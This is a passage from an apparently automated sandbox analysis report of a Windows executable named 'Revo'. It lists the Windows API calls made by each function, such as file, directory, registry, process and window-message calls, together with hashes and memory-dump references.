                                                                                                                                                                            • Instruction ID: ea3426adfb46afa29bf0fe74194f181189cf54c37864792d4d89e05057fb708c
                                                                                                                                                                            • Opcode Fuzzy Hash: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4901DF71A00205BBEB149F94DE98AAFB678FF80308F10443EF001B21D0D7B84E01976D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                              • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1655745494-0
                                                                                                                                                                            • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                                                            • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B67
                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2567322000-0
                                                                                                                                                                            • Opcode ID: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                                                            • Instruction ID: 0a43b9f96fb2b6b0c204ab13ec475b47687dff995c0faea4a1be46f6685e1a01
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE09271600218BBDB00AB54CD01EDE7B6ADB45700F104036B601B6190D6B5AE62DA98
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000408,?,00000000,00404259), ref: 00404618
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: x
                                                                                                                                                                            • API String ID: 3850602802-2363233923
                                                                                                                                                                            • Opcode ID: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                                                            • Instruction ID: 02f239cb91824dfe0454512e4452fc65e03e49c46eb4308609c978d489441530
                                                                                                                                                                            • Opcode Fuzzy Hash: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EC01271684200ABCA005B81EE00F177B20B7A5B02F20C87AF380200B096B6A461DB1E
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                                                            • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                                                            • Opcode Fuzzy Hash: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                                                            • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                                              • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1892508949-0
                                                                                                                                                                            • Opcode ID: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                                                            • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                                                            • Opcode Fuzzy Hash: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                                                            • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405CC8: ShellExecuteExW.SHELL32(?), ref: 00405CD7
                                                                                                                                                                              • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                                              • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 165873841-2766056989
                                                                                                                                                                            • Opcode ID: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                                                            • Instruction ID: fada87d5783261b67c1888f8bede04a63cf771d19a625931ff974fd18e721819
                                                                                                                                                                            • Opcode Fuzzy Hash: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                                                            • Instruction Fuzzy Hash: E0112B71E142198ADB10EFB9CA4AB8DB7F0AF04308F20457FE545F72D2DBB889449B18
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040580A
                                                                                                                                                                              • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00405856
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                                                            • Opcode ID: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                                                            • Instruction ID: 75974562a342b4767595fe941f1b5a5caa8115d748db5a0a183e84b8e7df0fb7
                                                                                                                                                                            • Opcode Fuzzy Hash: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                                                            • Instruction Fuzzy Hash: 71F090739015008AE74177A5AD01B2677A4EB98709F06847AEFC4B22B0E7B948118E5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                            • Opcode ID: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
                                                                                                                                                                            • Instruction ID: ce97bb54dc56410027eb81a7581dc46f0de68bed8411b1f66f85bdadb8ab3b17
                                                                                                                                                                            • Opcode Fuzzy Hash: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE04876908610DFE744EBA4AE495AE73B4EF84365710097FE041F11D1D7B94D00965D
                                                                                                                                                                            APIs
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00406AE9
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00406AF9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DispatchPeek
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1770753511-0
                                                                                                                                                                            • Opcode ID: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
                                                                                                                                                                            • Instruction ID: 1ddfa30a50b64daf61bbb77bbc73644e1ad8712fad2235fac67661dc563a41bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE08673A01119A7CE00B6A99D05ECB777C9B95750F014036FA01F3084E674E5028AB8
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
